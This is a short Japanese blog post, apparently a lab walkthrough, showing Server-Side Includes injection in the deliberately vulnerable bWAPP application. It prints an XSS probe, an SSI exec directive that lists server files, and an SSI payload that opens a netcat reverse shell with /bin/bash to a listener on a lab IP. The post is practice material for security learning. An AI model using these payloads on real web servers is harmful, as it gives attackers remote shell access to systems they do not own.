Shikata Ga Nai

Private? There is no such things.

bWappでサーバサイドインジェクションの悪用をしてみた

Hello there, ('ω')ノ

 

Server-Side Includes攻撃により、HTMLページにスクリプトを挿入したり。

任意のコードをリモートで実行したりして。

Webアプリケーションを悪用することができて。

攻撃者は、パスワードファイルなどの機密情報にアクセスして。

シェルコマンドを実行する可能性があって。

SSIディレクティブは入力フィールドに挿入され、Webサーバに送信されるので。

 

f:id:ThisIsOne:20220205161610p:plain

 

まずは、動作確認をするために下記を入力して。

 abc/xyz

 

f:id:ThisIsOne:20220205161736p:plain

 

入力された文字が反映されて。

 

f:id:ThisIsOne:20220205161821p:plain

 

次にXSSの検証を。

 <script>alert(1)</script>/xyz

 

f:id:ThisIsOne:20220205161950p:plain

 

XSSの脆弱性があるようで。

 

f:id:ThisIsOne:20220205162152p:plain

 

XSSのペイロードはhtmlコードで確認できて。

 

f:id:ThisIsOne:20220205162404p:plain

 

次にexecディレクティブを使用してみると。

 abc<!--#exec cmd="ls -a" -->/xyz

 

パラメータとしてcmdを使用してサーバーサイドのコマンドを実行できて。

サーバ内のディレクトリが表示されて。

 

f:id:ThisIsOne:20220205162854p:plain

 

netcatを使用してリモートシェルにアクセスして逆接続を確立できたりと。

まずは、Parrot OSのターミナルを開いてポート4444でnetcatリスナーを起動して。

 nc -nlvp 4444

 

f:id:ThisIsOne:20220205163445p:plain

 

下記のペイロードを入力して。

 <!--#exec cmd="nc 192.168.0.16 4444 -e /bin/bash" -->/xyz

 

f:id:ThisIsOne:20220205163524p:plain

 

f:id:ThisIsOne:20220205163349p:plain

 

Parrot OSのターミナルを確認するとbWAPPと接続できたようで。

netcatシェルを介した逆接続ができたわけで。

 

f:id:ThisIsOne:20220205163600p:plain

 

これは、Webアプリケーションサーバがハッキングされて侵入できることを意味して。

なので、下記のコマンドが実行できるわけで。

 

 id
 pwd
 whoami
 ls

 

f:id:ThisIsOne:20220205163852p:plain

 

Best regards, (^^ゞ